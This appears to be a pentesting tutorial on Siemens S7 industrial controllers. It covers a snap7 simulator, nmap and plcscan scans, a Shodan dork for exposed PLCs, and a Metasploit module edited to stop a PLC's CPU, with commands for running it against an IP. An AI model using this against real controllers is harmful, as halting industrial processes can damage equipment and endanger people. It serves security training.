Pentesting ICS (S7comm)

What is S7comm?

https://gamayan.com/knowledge-base/s7comm/

Siemens S7 PLC simulator

If you wanna play around, you can install an S7 simulator written on python:

  1. Download snap7-full-x.x.x.ziphttps://osdn.net/projects/sfnet_snap7/downloads/1.4.0/snap7-full-1.4.0.zip/
  2. Unzip with name snap7-full in ~/
  3. Execute the following commands
$ cd ~/snap7-full
$ sudo apt-get install python-pip
$ sudo -H pip install python-snap7
$ cd build/unix
$ make -f x86_64_linux.mk
$ cd ../bin/x86_64-linux/
$ sudo cp libsnap7.so /usr/lib
$ sudo ldconfig
$ sudo python
>>> import snap7
>>> s7server = snap7.server.Server()
>>> s7server.create()
>>> s7server.start()
>>> s7server.get_status()
('SrvRunning', 'S7CpuStatusRun', 0)
>>>

Now the simulator is ready!

Scan

Nmap scan:

nmap --script s7-info.nse -p 102 <host/s>

Shodan dork: port:102

Scan and identify: plcscan.py:

#Example usage

plcscan.py 192.168.0.1

plcscan.py --timeout 2 192.168.0.1:102 10.0.0.0/24

plcscan.py --hosts-list hosts.txt

Using nMap with the script s7-info.nsehttps://nmap.org/nsedoc/scripts/s7-info.html

nmap --script s7-info.nse -p 102 10.0.0.1/24

Exploits

There should be also some metasploit modules:

$ searchsploit Siemens Simatic S7

Add exploit 19831.rb to metasploit:

Metasploit comes with a ton of exploits already included; however, this Siemens exploit needs to be added. As the exploit was written with the usage of Metasploit in mind, this is a simple task. To add the module, run the following commands on the Kali Linux VM:

To adjust for using a newer Metasploit framework, we need to change the same code in the 19831.rb file. In the file take a look on the line 39:

OptInt.new('MODE', [false, 'Set true to put the CPU back into RUN mode.',false]),```

Change the preceding to this:

```ruby
OptInt.new('MODE', [false, 'Mode 1 to Stop CPU. Set Mode to 2 to put the CPU back into RUN mode.',1]),```

Now copy module to msf user directory:

```bash
$ cd ~/.msf4/modules/
~/.msf4/modules $ mkdir -p auxiliary/hardware/scada
~/.msf4/modules $ cd auxiliary/hardware/scada
~/.msf4/modules/auxiliary/hardware/scada $ cp /usr/share/exploitdb/platforms/hardware/remote/19831.rb 19831.rb
~/.msf4/modules/auxiliary/hardware/scada $ service postgresql start
~/.msf4/modules/auxiliary/hardware/scada $ msfconsole

Now go with metasploit:

msf > reload_all
msf > search siemens
msf > use auxiliary/hardware/scada/19831
msf auxiliary(19831) > show options
msf auxiliary(19831) > set RHOSTS 172.16.252.134
RHOSTS => 172.16.252.134
msf auxiliary(19831) > exploit
[+] 172.16.252.134 PLC is running, iso-tsap port is open.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

On newer Siemens devices, they added a password for certain actions! Use s7_password_hashes_extractor.py to extract hash and crack it online!

Manual exploitation

Intercept traffic then make packets reply and stuff!

Conclusions

Resources and bibliography:

Good to read:

Leave a Reply

Your email address will not be published. Required fields are marked *